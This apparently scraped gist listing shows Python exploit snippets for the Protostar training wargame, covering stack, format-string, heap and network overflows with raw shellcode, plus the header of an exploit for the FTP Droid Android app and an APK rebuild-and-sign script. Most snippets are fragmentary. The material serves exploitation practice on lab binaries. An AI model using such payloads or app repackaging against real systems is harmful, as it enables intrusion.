This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
shellcode = "\xe9\x1e\x00\x00\x00\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0f\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xffHello wolrd!\r\n" | |
with open('/tmp/stack5', 'w') as f: | |
times = 76 - sys.getsizeof(shellcode) # to fil the rest of the space | |
f.write(shellcode); | |
f.write('a' * times) | |
f.write('\xe0\xfc\xff\xbf') # write the pointer to the start of the address as EIP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
write_formt_exploit = '%20x%20x%20x%n' | |
write_ptr = '\xe4\x96\x04\x08' | |
input = write_ptr + write_formt_exploit + '\n' | |
proc = subprocess.Popen(['/opt/protostar/bin/format2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) | |
stdout,stderr = proc.communicate(input=input) | |
print stdout |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
#we need to write 16930116 more chars | |
target_address = '\xf4\x96\x04\x08' | |
value_to_write = '\xF7\x54\x02\x01' | |
padding = '\x41' | |
leak_ptr = '%x ' * 12 | |
write_to_ptr_format = '%x%x%x%x%x%x%x%x%x%x%x %0*c' + '%n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
# hello function 080484b4 | |
# vuln function 080484d2 | |
# printf address 0804971c | |
# exit address 08049724 | |
orig_leak_ptr = '%x %x %x %x %x %x' | |
leak_ptr = '%x %x %x %0*x %n' | |
write_to_address = '\x24\x97\x04\x08' # where should we write |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
input = 'a' * 64 + 'b' * 8 + '\x64\x84\x04\x08' | |
proc = subprocess.Popen(['/opt/protostar/bin/heap0',input], stdin=subprocess.PIPE, stdout=subprocess.PIPE) | |
stdout,stderr = proc.communicate() | |
print stdout |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
input = 'auth 1111111111111111111111111111111111111111\nreset\nservice 111111111111111111111111111111111111111111111\nlogin\n' | |
proc = subprocess.Popen(['/opt/protostar/bin/heap2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) | |
stdout,stderr = proc.communicate(input=input) | |
print(stdout) | |
# 08048494 g F .text 00000025 winner |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
# shellcode thanks to https://blackndoor.fr/protostar-final0/, https://www.exploit-db.com/exploits/13427/ | |
shellcode = '\x90' * 150 + b"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5f\x81\xef\xdf\xff\xff\xff\x57\x5e\x29\xc9\x80\xc1\xb8\x8a\x07\x2c\x41\xc0\xe0\x04\x47\x02\x07\x2c\x41\x88\x06\x46\x47\x49\xe2\xedDBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKBAFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIAJDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJOBLAALMNIA" | |
csocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
csocket.connect(('127.0.0.1', 2995)) | |
# ret addr thanks to https://blackndoor.fr/protostar-final0/ | |
ret_addr = b'\x60\xfa\xff\xbf' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import struct | |
def exploit(): | |
# sent_payload 'GET ' | |
padding = b'a' * 139 | |
payload = padding + struct.pack('I', 0xdeadbeef) | |
# connecting | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: FTP Droid 2.1.2 Remote Code Execution (1-click) | |
# Google Dork: [if applicable] | |
# Date: 30.12.2018 | |
# Exploit Author: Guy Ishay | |
# Vendor Homepage: https://forum.xda-developers.com/showthread.php?t=1175825 | |
# Software Link: https://play.google.com/store/apps/details?id=berserker.android.apps.ftpdroid | |
# Version: 2.1.2 | |
# Tested on: Android 4.4 | |
# CVE : None | |
# ==================== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# pretty basic shit | |
rm stage1-unsigned.apk res.apk | |
apktool b base -o stage1-unsigned.apk | |
jarsigner -keystore my-release-key.keystore -storepass 1234567890 stage1-unsigned.apk my-key-alias | |
mv stage1-unsigned.apk res.apk |
OlderNewer